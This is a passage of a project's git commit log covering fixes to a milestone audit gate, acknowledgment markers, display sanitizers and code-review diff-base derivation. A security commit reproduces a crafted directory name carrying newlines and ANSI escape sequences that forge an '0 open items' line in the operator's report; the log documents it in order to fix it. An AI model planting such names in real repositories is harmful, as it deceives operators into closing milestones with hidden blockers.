machine consumer could no longer tell "I/O failed" from "verified clean" — the
exact conflation this issue exists to remove, reintroduced on the failure path.
`listAuditPhaseTargets` now reports `activeUnreadable` and each scanner pushes
the sentinel shape recovered verbatim from `origin/next`, not reinvented.

The docstring claiming the active enumeration was "UNCHANGED" was false while
that sentinel was missing, and is corrected to state what is actually preserved.

An unreadable ARCHIVED root deliberately gets NO sentinel: there was no archived
read before, so there is no consumer contract to preserve, and adding one would
conflate the ordinary "no milestones archived yet" state with a real I/O failure.

## The operator could not see the archive

`formatAuditReport` is the surface the gate actually shows a human —
`complete-milestone.md` runs it without `--json` — and it never rendered
`archived_milestone`. With `01-alpha` in both roots the identical line printed
twice with nothing to tell them apart, and `[R] Resolve` sends the operator to
`.planning/phases/01-alpha/` where the archived one does not exist. Phase
numbering restarts at `01` after each archive, so that collision is the common
case, not an edge case. All four loops now render ` (archived vX.Y)`; active
lines stay byte-identical.

## Archived milestones sorted wrong

`getArchivedPhaseDirs` ordered milestones with `.sort().reverse()` —
lexicographic, so `v1.9` outranked `v1.10`. Measured order for v1.0/v1.9/v1.10
was `v1.9, v1.10, v1.0`. Now a numeric-segment descending compare. Pre-existing,
but this change is what first surfaces it in audit output.

## Tests

The blocker's regression test fails against the previous revision. Added:
`archived_milestone` present on archived items and absent (not `undefined`) on
active ones; the unreadable-active-root sentinel across all four categories; an
unreadable archived root still leaving the active half scanned; the
duplicate-name case producing two distinct entries that the human report
distinguishes; and the v1.10-before-v1.9 ordering.

`docs/COMMANDS.md` documents the archived scanning and the new field.

Closes #3458

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#3458): stop filesystem names forging lines in the audit report

Found by the security review of this branch. Pre-existing on `next`, fixed here
because it defeats the exact gate this PR is hardening.

`audit-open`'s human report is the surface `/gsd-complete-milestone` shows an
operator to decide whether a milestone may close. A `.planning/` tree authored
by someone other than that operator — a cloned repo — could contain a directory
literally named:

    zz<newline>0 open items require decisions.<newline><ESC>[2K<ESC>[1G FORGED

and the report printed `0 open items require decisions.` as its own line, with
raw ESC bytes reaching stdout able to erase or overwrite the lines above it.
Reproduced against the real CLI before fixing, and again after.

## Why not just harden sanitizeForDisplay

Because that helper's contract is multi-line prose — it removes protocol-leak
lines while deliberately preserving the newlines between legitimate ones, which
`tests/security.test.cjs` pins. Stripping CR/LF there would have broken a
correct test to paper over a different problem.

The two jobs are genuinely different, so there are now two helpers. New
`sanitizeLabel` (`src/security.cts`) is for values that are semantically ONE
LINE and derived from a filesystem NAME. It ESCAPES rather than strips C0
(including ESC/CR/LF), DEL and C1, so a doctored name renders visibly as
`\n` / `\x1b` instead of being silently normalized — the report stays honest
about what is in the tree. Ordinary input passes through byte-identical.

## Nine sites, not four

The first pass covered the four phase-scoped scanners. A sweep of the rest of
the file found the identical class in five more — `scanDebugSessions`,
`scanQuickTasks`, `scanThreads`, `scanTodos`, `scanSeeds` — emitting
name-derived `slug` / `filename` / `seed_id` through the prose sanitizer.
`scanQuickTasks`' `date` had no sanitization call at all.

Every emitted field in the file is now classified and the sweep recorded:
`slug`, `filename`, `seed_id`, `phase`, `file`, `archived_milestone`, `date` are
name-derived and take `sanitizeLabel`; `hypothesis`, `status`, `updated`,
`title`, `priority`, `area`, `summary`, `questions[]` and deferred-item `text`
are content and keep `sanitizeForDisplay`. No name-derived value reaches output
unsanitized.

`--json` was already safe — JSON string encoding escapes control characters, and
a crafted name cannot break out of the string. Verified rather than assumed.

Closes #3458

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* chore(#3458): backfill changeset pr number

* test(#3458): skip control-character fixtures where the OS forbids the name

CI red on `test (windows-latest, 24, shard 1/3)`: the four forgery-rejection
tests build directories whose names embed a newline and ESC, and NTFS forbids
control characters in path components, so `mkdir` threw ENOENT.

The remote runner is Linux-only, so it could not have caught this class.

Semantically the skip is honest rather than a workaround: on Windows the
directory-name forgery vector does not exist, because the OS refuses to create
the name. The sanitizer's own behavior stays covered there by the
`sanitizeLabel` unit tests, which are pure string tests with no filesystem
calls — verified.

Uses the repo's established capability-probe convention
(`tests/adr-index-gate.test.cjs`'s `trySymlink`), which `t.skip()`s on the real
errno rather than branching on `process.platform`, and whose comment gives the
reason: a bare `return` "would silently report a PASS ... and hide the gap this
guard exists to close". A skipped test is visibly skipped.

Swept every test added on this branch for names Windows would reject or POSIX
path assumptions; these four were the only ones.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* feat(#3458): make [A] Acknowledge actually suppress, without overwriting a verdict

Making archived phases visible exposed the other half of the problem: an item
unresolved at a milestone close now resurfaces at every later close forever,
because `[A] Acknowledge` wrote a prose block to STATE.md that
`auditOpenArtifacts` never reads. `verified_closeout` became unreachable and the
gate degraded to a mandatory `[A]` every time.

## The prompt does not change

`[A] Acknowledge all` already promises "document as deferred and proceed with
close". It documented but never deferred. This makes `[A]` do what it says.
`[R]` and `[C]` stay abort paths. No "carry forward" option is invented — an
item that is not acknowledged simply keeps surfacing, which is the default.

## The marker lives inside the artifact

Not a ledger. The audit mints no ids and has no stable identity — `phase` is a
token that collides across directories, `file` for deferred items is a constant,
and identity otherwise degrades to the item's own prose after a lossy sanitizer.
Any ledger must re-derive that key every close, so a reworded item silently
un-suppresses or, worse, mis-suppresses a different one. Storing the
acknowledgment next to the thing it suppresses makes that class of bug
structurally impossible, and it is the pattern `src/uat.cts` already argues for
with `deferred-items.md`'s in-place `status: resolved`.

## The marker is verdict-preserving and self-invalidating

`status:` is never overwritten — writing `resolved` into an unresolved UAT would
be a lie in the artifact of record, and the disclosure has to be additive.

    audit_acknowledged:
      milestone: v1.0
      at: 2026-08-15
      status: gaps_found      # snapshot of what was true when acknowledged

Suppression applies ONLY while the snapshot still matches reality: `status` for
seven categories, `question_count` for context questions, and for deferred items
a new per-entry `status: acknowledged` distinct from `resolved`, which keeps
meaning "actually fixed". Change the artifact and the acknowledgment stops
applying, so the item comes back on its own.

That is what makes re-opening answer itself with no extra state, and it fails in
the safe direction: a stale acknowledgment can never hide a NEW problem. A
malformed marker is treated as absent — a bad marker must never silence an item.

The check is ONE shared `isAuditItemAcknowledged`, not nine copies. This file has
already been through that defect family twice in this PR.

## Observable, not silent

`audit-open --json` now reports an `acknowledged` count beside `counts`, so a
reviewer can tell a close that is clean because things were fixed from one that
is clean because things were silenced.

## Writer

New `audit-open acknowledge` verb snapshots current state itself, so the marker
is never hand-authored from workflow prose — the gap that left the STATE.md
block with no writer, no schema and two conflicting formats. Writes route
through the existing path-confinement seam.

## Two deliberate limits, failing closed

Heading-delimited deferred entries (#3457) are REFUSED with
`unsupported_heading_shape` rather than edited, because mapping a heading entry
back to its exact source span is not safely derivable when headless and heading
entries interleave in one file. A loud refusal beats a mis-targeted write.

A quick task with no summary gets one created to carry the marker, since there
is otherwise nowhere to put it.

## Tests

Self-invalidation is the important one and is covered per category: acknowledge,
then change the status or question count, and the item resurfaces. Also
malformed markers not suppressing, `status:` byte-unchanged after acknowledging,
the writer refusing a path outside the project, and the four original #3458
scenarios unchanged.

Closes #3458

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* feat(#3458): wire [A] to the acknowledge verb and converge the disclosure table

Consumer side of the suppression seam.

## The workflow stops hand-authoring the mechanism

`[A]` now calls `audit-open acknowledge` once per open item, then writes the
STATE.md `## Deferred Items` table as before. The table stays as a
human-readable disclosure; it is no longer the mechanism. That closes the gap
where the block had no writer, no schema and no reader — the marker is now
written by the tool, which snapshots current state itself.

The `[R]` / `[A]` / `[C]` prompt is unchanged, `[C]` still means "Cancel — exit
without closing", and no carry-forward option is invented.

The all-clear branch now distinguishes a close that is clean because items were
FIXED from one that is clean because they were ACKNOWLEDGED, using the
`acknowledged.total` count, and carries that into the MILESTONES.md disclosure
line beside the existing override count. A clean close that was bought with
acknowledgments should say so.

## Format drift resolved

Two incompatible `## Deferred Items` shapes shipped simultaneously — 3 columns
in the workflow, 4 in the template, with different body lines. Converged on one
5-column shape carrying the source Milestone, since archived items now appear
and the archived-milestone disambiguator was previously discarded at write time.
The workflow enumerates the categories instead of trailing off in `...`.

## Ack fragment bookkeeping

`complete-milestone.md` grows 6,764 bytes (31,228 → 37,992; cap 61,440), covered
by a new `tests/emitted-drift-acks/3458-*.json`.

`2962-zsh-nomatch-for-glob-portability.json`'s `complete-milestone.md` entry is
REMOVED — the no-duplicate-path rule hard-blocks two sources naming one path.
That entry is spent: the nullglob shim it acknowledges is present in both
`origin/next` and the CI emitted baseline `fd2b97a5`, so its ripple is already
absorbed and it can never clear anything again — verified directly, not assumed,
and the gate's own message directs deleting spent entries. Its other three files'
entries are untouched.

`scripts/sync-runtime-launcher.cjs` wanted to rewrite `explore.md` as well —
pre-existing drift unrelated to this change, reverted. `complete-milestone.md`
still carries exactly one canonical preamble.

Docs cover the verb's real flag surface, the marker's verdict-preserving and
self-invalidating behavior, and the new `acknowledged` count. A second `Added`
changeset covers the verb, since the existing `Fixed` fragment describes only
the archived-phase scanning.

Closes #3458

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#3458): close three blockers in the acknowledgment seam

Adversarial review of the seam. Three BLOCKERs, one of which disproves a safety
claim I published in the PR body, the changeset and the docs.

## The claim was false; the code is fixed rather than the claim softened

I wrote that "a stale acknowledgment can never hide a NEW problem". It could.
`context_questions` snapshotted only the question COUNT, so replacing two
acknowledged questions with two brand-new blockers kept the item suppressed.
`uat_gaps` snapshotted only `status`, so adding five more pending scenarios
(`open_scenario_count` 1→6) kept it suppressed.

The snapshot now identifies CONTENT, not size: a digest of the whole question
set, and a status + open-scenario-count composite. Any edit invalidates. The
other seven categories were checked and their single tracked dimension is
already the whole story. Both disproofs now resurface the item.

## Writing to the wrong line, and reporting success

`acknowledgeDeferredItem` built an unanchored regex and exec'd it over the whole
file while match-selection and the ambiguity guard ran over the section body
only, so the write landed at the first match ANYWHERE. A file with `# Notes`
holding `- Fix the parser` above a `## Deferred Items` section holding the same
bullet: the CLI exited 0 saying `acknowledged: true`, injected `status:
acknowledged` under `# Notes`, and re-audit still reported the entry open. It
corrupted unrelated content, suppressed nothing, and claimed success — and since
`--file` is unconstrained the same path could inject into a UAT or VERIFICATION
body.

Matching is now anchored to the selected section, and the matched span is
re-verified against the selected entry before any write; a mismatch refuses with
`match_verification_failed` rather than writing.

## Acknowledging todos hid the ones never shown

`scanTodos` capped at five files and then checked acknowledgment. With seven
todos, acknowledging the five that were LISTED drove `todos: 0`,
`has_open_items: false`, and items six and seven never appeared in any later
scan. The workflow's own "repeat until no todos items" remedy terminates after
one pass. Pre-feature this was unreachable because the count was pinned at five.

That is silent over-suppression — the exact direction this PR exists to remove.
Acknowledged items are now filtered BEFORE the display cap, so unacknowledged
todos beyond it still drive the count.

## The [A] branch could not fail closed

Every acknowledge call sat in a `cmd | while read` pipeline with no status
accumulation, so any refusal was discarded and the close proceeded as
`override_closeout`. Separately, `io.output` swaps payloads over 50000 chars for
an `@file:<path>` sentinel — every `jq` would then fail, every loop body run
zero times, nothing be suppressed, and the close happen anyway.

Both closed: failures accumulate across all invocations and halt before close,
and the sentinel is dereferenced using the same pattern `verify_readiness`
already uses for `INIT_MANAGER`. Quoting was verified sound by the review and is
left alone.

## Also

Suppression is now visible in the human report, not only `--json` — the
"clean because fixed vs clean because silenced" distinction was promised for the
surface an operator actually reads.

The CRLF-preservation branches in the writer were dead: every `.md` write goes
through `_normalizeMd`, which normalizes line endings and blank lines whatever
the writer does. Deleted and documented rather than left as code that cannot run.

## Why these shipped

The review named it exactly: there was no coverage for
`unsupported_heading_shape`, `ambiguous`, `not_found`, duplicate-text
mis-targeting, todos beyond the cap, or CRLF. All are now tested, alongside both
snapshot disproofs and the mixed-section fixture.

Closes #3458

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* test(#3458): align the items-open footer wording with its assertion

Remote runner red on one test: the items-open footer must match
`/previously acknowledged item/i`.

The disclosure was NOT missing — the items-open branch already printed
"N additional items previously acknowledged and still suppressed." The word
order simply did not match the regex the test in the same change asserts. A
wording mismatch between my own test and my own implementation, not a behavior
gap.

Reworded to "N previously acknowledged items also suppressed above the M open
items", which satisfies the assertion and states the relationship between the
two counts more plainly than the original did.

Swept `formatAuditReport` for other branches that could skip the tally: the only
early return is the all-clear path, which already discloses it. `scan_error`
sentinels are filtered per category and excluded from `counts.total`, so an
all-error project falls through to that same branch. No inconsistency remains.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#3458): splice by carried span, digest the untruncated question set

Security review of the writer. Both findings are the same shape, and both are
cases where an earlier fix of mine was incomplete in the same direction: a value
derived for DISPLAY was reused for an IDENTITY or LOCATION decision.

## Writing to the wrong entry, again

The previous fix anchored matching to the `## Deferred Items` SECTION but still
re-found the entry inside it with an unanchored regex, so the write landed at
the first SUBSTRING occurrence rather than the entry's own span. The
`match_verification_failed` guard could not catch it, because the mis-targeted
span is byte-identical to the target.

Probe-confirmed, in a cloned repo's own artifact:

    - CRITICAL unfixed auth bypass
      see also: - minor typo
    - minor typo

Acknowledging "minor typo" appended `status: acknowledged` into the CRITICAL
entry, suppressing it at every future close, while the typo stayed open — exit
0, `"acknowledged": true`. A variant where the target text appears inside
unrelated prose split that line mid-sentence, acknowledged nothing, and still
exited 0, so the workflow's `ACK_FAILURES` halt never fired.

Fixed structurally rather than with a better regex: `splitGapsEntriesWithSpans`
carries each entry's own character span out of the splitter, and the write
splices by that recorded span. The location is already known at selection time —
re-deriving it by searching was the entire defect class. Added as a sibling so
`splitGapsEntries`' three existing callers are untouched. With index-splicing,
`match_verification_failed` becomes a genuine independent cross-check instead of
a guard that could never fire.

## The digest was blind past the third question

`deriveOpenQuestions` truncated to three questions, and clamped each to 200
chars, BEFORE the digest hashed it — so the snapshot could not see the fourth
and later. Ship three innocuous questions, acknowledge, then add real blockers,
and they are permanently invisible: measured `open=0, acknowledged=1`, report
"All artifact types clear."

That is the same self-invalidation property this digest was added to guarantee
one revision ago. The digest now covers the untruncated list; truncation is
display-only.

Found while fixing it: the previous digest joined on a literal raw NUL byte
embedded in the source — collisions are constructible, and reachable through
attacker-controlled YAML `\x00` escapes. Verified both ways. Replaced with a
length-prefixed encoding so no two question sets can collide by concatenation.

## Sweep

Because this is the third incomplete fix on this seam, every identity and
location derivation was swept for the display-vs-identity confusion: uat_gaps
uses status plus a full-content count, the other seven categories use a scalar
status or presence, the deferred `--text` identity is never truncated, and all
five flat categories resolve their file by path rather than by content search.
No further instances.

Closes #3458

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* test(#3458): correct two assertions that over-reached the measured behavior

Remote runner red on two of the F1 tests. The source is correct — reproduced
both fixtures against the built CLI — and both failures were bugs in the
assertions I wrote. `src/` is untouched by this commit.

The first is worth recording. It computed the CRITICAL entry's block as

    content.slice(content.indexOf('- CRITICAL'), content.indexOf('- minor typo'))

and `indexOf` found the FIRST SUBSTRING occurrence, which lives inside that
entry's own continuation line `  see also: - minor typo`. The block was
truncated mid-line, so the assertion could never match. The test committed the
exact first-substring-match mistake it exists to catch, one revision after that
mistake was fixed in the source.

The second asserted `deferred_items === 0` after acknowledging the typo entry,
but the decoy `- Note: reference - minor typo elsewhere, ignore` is itself an
open entry and was never acknowledged, so the correct count is 1. It now also
asserts WHICH item remains open — that is what actually proves the right entry
was suppressed, and the original assertion would have passed even if both had
been silenced.

Both now derive their expectations from measured CLI output. A comment records
that the write seam normalizes markdown (`_normalizeMd` inserts a blank line
before a list item following a non-list line) so the inserted line is not later
mistaken for a regression; that is repo-wide behavior for every `.md` write
through the single write projection, not something this change should diverge
from.

Root cause of both: the previous two dispatches verified behavior with direct
CLI probes but never executed the test file, so assertions could over-reach what
had actually been measured. Every other assertion added in those two commits has
since been re-derived from real output; no further mismatches.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

---------

Co-authored-by: sim <sim@local>
Co-authored-by: Claude Opus 5 <noreply@anthropic.com>
2026-08-15 17:00:52 -04:00
sim
147856040b fix(#2873): close review findings across fences, sanitizer and docs
Isolated security review found resolveSpecRootReference's fence tracker
toggled on any delimiter, so a backtick fence could be closed by a tilde
one and an include in the gap was rewritten inside a code block. Fixed by
reusing scanFencedBlocks - the canonical engine already behind
stripFencedCode and extractFencedBlock - rather than carrying a fourth
copy of fence detection, which also closes the duplication the standards
review flagged.

sanitizeForRender now strips combining marks and zero-width characters
alongside the ANSI, control and bidi classes it already handled.

Adds the C, E and F matrix rows the spec review found missing, including
installer-level coverage that spawns the real install rather than calling
the report builder. Ships the how-to, the reference and command docs in
five locales, the changeset, the inventory and glossary entries, and
regenerates health.md for the new W028 rule.

Refs #2873
2026-08-14 23:48:39 -04:00
Tom Boucher
8fc88f663d fix(#3210): gate unmet preconditions as blocking-human; cap blocker retries at needs_human (#3528)
* fix(#3210): gate unmet preconditions as blocking-human and cap blocker retries at needs_human

* chore(#3210): add changeset fragment for PR #3528

* fix(#3210): restore blocking-human carve-out and CRLF-safe split

---------

Co-authored-by: sim <sim@local>
2026-08-14 23:01:30 -04:00
Tom Boucher
49b60070a0 fix(#3503): derive the code-review diff base from GSD's own commit scopes, not prose mentions (#3526)
* fix(#3503): derive the code-review diff base from GSD's own commit scopes, not prose mentions

The #2989/#3191 anchor ('[Pp]hase N' + POSIX boundary) still resolved the
phase diff base ~4 phases early on real repos: git log --grep searches full
commit bodies and tail -1 keeps the OLDEST match, so a single prose mention
anywhere in history (a planning commit forward-referencing the phase per
D-09, a doc commit using '### Phase N' as a format example) silently
captured the base — while GSD's own commits, which use conventional-commit
scopes (docs(phase-6):, feat(6-01):, docs(06):) and never contain the
literal 'Phase N', were matched by nothing. The wrong base inflated the
Tier-3 file-list fallback, the #2666 SUMMARY/diff union, the reviewer
agent's diff_base, and fallow's --changed-since scope, with no warning.

All three derivation sites (Tier-3 fallback, spawn_reviewer, fallow
structural pre-pass) now grep for the subject-line conventional-commit
phase scope under --extended-regexp, in lockstep per the #3191 contract:

  ^[[:alpha:]]+!?\((phase-)?(N|0N)(-[0-9]+)?\)!?:

PHASE_SCOPE_NUM accepts both padded and unpadded phase spellings because
workflows emit the unpadded roadmap number (docs(phase-6):) while
code-review greps the zero-padded PADDED_PHASE. The ^ anchor makes it a
subject-line match, so commit-body prose can never capture the base. The
POSIX-ERE portability rule (#3191, no \b), the fail-closed empty-result
warning, and the --files escape hatch are preserved: histories with no
scope-style commits yield no base instead of an arbitrary one.

Tests (tests/code-review-pipeline-regression.test.cjs): new Bug 6 (#3503)
block executes the SHIPPED bash from all three sites against a real git
fixture whose history carries every prose false-positive class from the
issue — red pre-fix (the prose-body commits captured the base at every
site), green post-fix. The Bug 5 (#3191) block is updated to the scope
anchor contract (its fixtures bound to the shipped text), and its T6
docs-parity guard now enforces the identical scope-anchored grep plus the
PHASE_SCOPE_NUM prep at every git-log site.

Emitted drift: 3503-diff-base-scope-anchor.json acks the deliberate
workflow growth; the spent 3191-unanchored-grep-sites.json fragment (its
code-review.md entry was consumed when #3191 merged) is pruned.

* chore(#3503): add changeset fragment for PR #3526

* fix(#3503): rebase onto next and correct the emitted-drift ack

Rebase onto origin/next@6badb839 (PR freshness: #3514/#3516 landed after
this branch was cut). Post-rebase the attribution gate classifies the two
source-path ack entries (gsd-core/workflows/code-review.md, structural-
pre-pass.md) as stale — source files present in the diff are identity-
attributed by the table, so only the emitted code-review.md basename
growth needs an acknowledgment. The fragment now names exactly that one
consumed entry.

---------

Co-authored-by: sim <sim@local>
2026-08-14 23:01:00 -04:00
Tom Boucher
ddf852873c fix(#3357): one phase-pinned resolver for verification-report discovery (#3513)
A phase directory can hold more than one `*-VERIFICATION.md` — an ad-hoc `03-CORRECTION-VERIFICATION.md` worksheet beside the real `03-VERIFICATION.md`. Discovery took the alphabetically-first match, so the worksheet won and the phase could report `missing` while a passing report sat next to it.

The issue named two copies. There were seven, in four grammars: two `.sort()[0]` sites in the verification module, three `.find()` over UNSORTED readdir order (phase status, and `verification_path` twice — filesystem-dependent, so two machines on one commit could disagree), and two in shell. All seven now route through one exported `resolveVerificationFile`; the shell copies via a new `verification resolve-file` verb rather than hand-rolling the rule an eighth time.

Fixing five of seven would have been worse than fixing none: the verify-work workflow is a WRITER that stamps `status: passed` onto the file it picks, so canonical-aware readers plus an alphabetical writer means the human_needed→passed canonicalization silently no-ops forever while the worksheet gets stamped. That divergence did not exist on next.

The first resolver was itself a regression — it preferred ANY canonically-shaped name over the phase's own report, so a stray cross-phase or sentinel-numbered file outranked it. The global-canonical preference was removed rather than narrowed; the rule is pinned to the phase token via `PHASE_NUMBER_TOKEN_SOURCE`, its existing owner.

Fixed in passing: the transition workflow's awk guarded on `NR==1` instead of `FNR==1`, so across a multi-file glob it armed only on the first file — a leading worksheet with no frontmatter blocked transition even when the canonical report passed. Also removed a U+00AD soft hyphen introduced earlier on this branch.

Five broader-grammar AGGREGATE scans are deliberately out of scope — a different defect class (phase-unscoped scanning), tracked as #3511.

Closes #3357

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
2026-08-14 19:18:29 -04:00
Tom Boucher
71180983a0 fix(#3423): standardize on <required_reading>, retire the files_to_read emit tag (#3432)
* fix(#3423): standardize on required_reading, retire files_to_read emit tag

* test(#3423): flip tag assertions, extend consistency guard to spawner surfaces

* fix(#3423): sweep capabilities fragments, regen registry+skills, anchor executor test

* chore(#3423): acknowledge tag-rename emitted ripples and workflow growth

* chore(#3423): broaden emitted-ripple acknowledgment to all embedders

* chore(#3423): settle emitted-drift acks post-rebase (merge 3004/1689-owned keys)

* chore(#3423): drop stale ripple acks, ack execute-phase growth

* chore(#3423): restore pristine 3004 fragment, keep only consumed appends

* chore(#3423): backfill changeset pr number

* chore(#3423): settle emitted-drift acks post-merge (move code-review-fix ripple into 3190, tag-rename ripples into 3191/3297)

* chore(#3423): re-arm 3324 ack for execute-phase.md tag-rename ripple

* fix(#3423): trim 8 bytes from execute-phase model note to hold ADR-857 margin, re-arm 3370 ack for net +4 growth

---------

Co-authored-by: sim <sim@local>
2026-08-14 16:03:48 -04:00
0xdhx
27cad971d0 enhance(#2115): replace bare eval with llm eval and drop ai system in the AI-integration gate (#3431)
* enhance(#2115): tighten AI-integration gate keywords per re-triage pin

Apply the maintainer-pinned scope from the 2026-07-31 re-triage on #2115
exactly: `eval` -> `llm eval`, `ai system` dropped, every other token and
the surrounding sentence byte-identical. Supersedes the stale-closed PR
#3131, whose broader whole-word-matching rework went beyond the pin.

* chore(#2115): set changeset fragment pr to 3431
2026-08-14 12:33:12 -04:00
Tom Boucher
362d0434b2 fix(#3370): state checkpoint gate semantics in executor dispatch prompts (#3478)
* fix(#3370): state checkpoint gate semantics in executor dispatch prompts

* fix(#3370): set changeset pr to 3478

* fix(#3370): keep gate rule in routing fragment under phase-6 ceiling

---------

Co-authored-by: sim <sim@local>
2026-08-14 11:42:22 -04:00
Tom Boucher
26f8015cc2 fix(#3448): thread next_action through debug auto-resume respawn (#3476)
* fix(#3448): thread next_action through debug auto-resume respawn

Both /gsd-debug auto-resume call sites (Section 1c continue-path return
handling and Section 4's non-terminal branch) respawned the session manager
with identical session_params, making every resume prompt-indistinguishable
from a cold start: the checkpoint's recorded next_action and the disposition
that any earlier checkpoint was already answered never reached the respawned
agent. Two auto-resumes then made no progress and the (correct) no-progress
guard stalled the loop.

The respawn now carries resume: true, resume_status, and resume_next_action
sourced from the checkpoint file; the session manager documents the params
and its Step 2 gsd-debugger template forwards them via a DATA_START/DATA_END
<resume_directive> (Step 3d's shape), instructing the debugger to proceed
directly on the recorded next action without re-raising answered checkpoints.
The anti-loop guard (next_action-only heuristic, 3-resume hard cap) is
untouched.

* chore(#3448): set changeset pr to 3476

---------

Co-authored-by: sim <sim@local>
2026-08-14 11:26:08 -04:00
Tom Boucher
5452f1a700 fix(#3324): build-time embed execution context instead of literal @-includes (#3462)
* fix(#3324): build-time embed execution context instead of literal @-includes

* chore(#3324): add changeset

* chore(#3324): set changeset pr reference

* fix(#3324): trim embed note to stay under the 93400 margin ceiling

---------

Co-authored-by: sim <sim@local>
2026-08-14 10:33:09 -04:00
Tom Boucher
011153c076 fix(#3300): guard build_prompt optional sections against nullglob (#3454)
* fix(#3300): guard build_prompt optional sections against nullglob

* chore(#3300): backfill changeset pr number 3454

---------

Co-authored-by: sim <sim@local>
2026-08-14 02:53:19 -04:00
Tom Boucher
7d08d80234 fix(#3297): project --gaps mode onto next-up execute command (#3453)
* fix(#3297): project --gaps mode onto next-up execute command

* chore(#3297): set changeset pr to 3453

---------

Co-authored-by: sim <sim@local>
2026-08-14 02:47:24 -04:00
Tom Boucher
2537c286f9 refactor(#1762): clarify verification-missing/unknown routing text (#3439)
* test(#1762): assert reassuring verification-routing wording (RED)

Regression test for #1762 — asserts readVerificationStatus's missing/
unknown next_action text reassures the user that execute-phase resumes
at the verification gates without redoing work, instead of reading as
a blind re-run instruction. Fails against current wording; the fix
lands in the next commit.

* fix(#1762): reassure verification-missing/unknown routing text is safe to run

readVerificationStatus's 'missing' and 'unknown' next_action text read as
"redo the implementation", when execute-phase's own discover_and_group_plans
step (#2868) already resumes at the verification gates and skips
execute_waves/checkpoint_handling entirely when every plan already has a
SUMMARY.md. Reword both to say so explicitly, and soften the 'unknown'
message to acknowledge a non-standard status may be an intentional marker
rather than presuming re-verification is always the fix.

Also updates progress.md's Route V.missing / V.unknown to consume the
dynamic $VERIFICATION_NEXT_ACTION (matching V.gaps/V.human) instead of a
hand-duplicated string, so the reassurance lands there too without a second
copy to keep in sync.

No change to next_command routing, status values, or the isPhaseComplete
completeness predicate (still gated on status === 'passed' per the #2957
DISK-STRICT decision) — advisory text only.

* fix(#1762): drop duplicated reassurance clause in progress.md routing text

Review finding: the SUMMARY.md reassurance was stated once via the
interpolated $VERIFICATION_NEXT_ACTION and again as a parenthetical on
the command line, in both Route V.missing and Route V.unknown. Trimmed
the parenthetical so $VERIFICATION_NEXT_ACTION stays the single source
of truth.

* docs(#1762): add changeset fragment

Type Changed with a docs-exempt marker — advisory routing text only,
no docs page documents this specific message today.

* test(#1762): acknowledge progress.md emitted-content growth

Route V.missing/V.unknown now render a small block referencing
${VERIFICATION_NEXT_ACTION} instead of a bare command line, growing
progress.md by 376 bytes. Deliberate per the differential attribution
check (ADR-2719).

* chore: drop spent progress.md ack from #3218's emitted-drift fragment

The #3218 growth it described is already on next (inert, per the
lint's own note that spent acks 'can no longer clear anything').
Its presence collided with the new #1762 fragment naming the same
bare filename, which lint-emitted-drift-ack rejects outright ('two
ack sources may never name the same path'). #3218's other two
acks (plan-phase.md, plan-review-convergence.md) are untouched.

* docs(#1762): backfill changeset PR number

---------

Co-authored-by: sim <sim@local>
2026-08-14 01:49:49 -04:00
Tom Boucher
fd4715f80f fix(#3262): guard phase writes against milestone-scope headings (#3446)
* fix(#3262): guard phase writes against milestone-scope headings

* fix(#3262): fill changeset pr with 3446

---------

Co-authored-by: sim <sim@local>
2026-08-14 01:44:54 -04:00
Tom Boucher
dbbcb8f736 fix(#3191): anchor remaining diff-base greps, portably (#3437)
* fix(#3191): anchor remaining diff-base greps, portably

The #2989 fix anchored only the Tier-3 grep, and did so with \b — not a
POSIX ERE token, so on macOS regex(3) it silently matches nothing and
Tier 3 always fails closed. spawn_reviewer's agent-context DIFF_BASE and
the fallow structural pre-pass's --changed-since base each still ran the
original unanchored --grep="${PADDED_PHASE}", whose oldest substring
match is routinely a version-string/date commit from months before the
phase existed — feeding the reviewer agent a bogus diff_base exactly
when files: is empty, and widening fallow's changed-files scope.

All three derivations now use the same anchored, POSIX-portable
'[Pp]hase N([^[:alnum:]_]|$)' with --extended-regexp; spawn_reviewer
also gains Tier-3's parent-exists guard so the two computations are the
same algorithm. Behavioral regression tests execute the shipped bash
extracted from the workflow files against a git fixture on every
platform, so the macOS \b hole is covered, not just the Linux CI view.

* chore(#3191): backfill changeset PR number 3437

* fix(#3191): scope fallow test snippet past the gsd-tools resolver

The CI runners have no installed gsd-tools, so executing the resolver
line that precedes FALLOW_SCOPE_ARGS in the extracted fence exits 1
before the derivation under test ever runs. Slice the snippet to start
at FALLOW_SCOPE_ARGS=() — the resolver is orthogonal to the base
derivation the regression test binds.

---------

Co-authored-by: sim <sim@local>
2026-08-14 00:53:13 -04:00
Tom Boucher
483083aea6 fix(#3194): verify source-grounded lane evidence from review output (#3436)
* fix(#3194): verify source-grounded lane evidence from review output

* chore(#3194): fill changeset pr number

---------

Co-authored-by: sim <sim@local>
2026-08-14 00:29:42 -04:00
Tom Boucher
1d5d77951c fix(#3190): commit review.md in --auto loop; fix report env var (#3434)
* fix(#3190): commit review.md in --auto loop; fix report env var

Three coupled defects in gsd-core/workflows/code-review-fix.md:

- The --auto re-review loop overwrote REVIEW.md each iteration but the
  single docs commit staged only REVIEW-FIX.md, so the committed REVIEW.md
  stayed at iteration 1 and contradicted the committed REVIEW-FIX.md. The
  --auto commit now stages the converged REVIEW.md alongside REVIEW-FIX.md
  (guarded on AUTO_MODE; non-auto single-pass runs unchanged).
- The two inline frontmatter validators (HAS_STATUS, FIX_FRONTMATTER)
  exported REVIEW_PATH into a node -e body that reads process.env.
  FIX_REPORT_PATH, so the status check was always empty and REVIEW-FIX.md
  was never committed. Both now export FIX_REPORT_PATH.
- On successful convergence the spent .iterN.md backups are removed so the
  phase directory is clean; they are retained on degradation for post-mortem.

Regression test: tests/code-review-fix-pipeline-regression.test.cjs.

* chore(#3190): set changeset pr to 3434

---------

Co-authored-by: sim <sim@local>
2026-08-14 00:26:07 -04:00
Tom Boucher
7976b1ca0d feat(#1689): per-plan agent_hint executor routing (#3417)
* feat(#1689): per-plan agent_hint executor routing

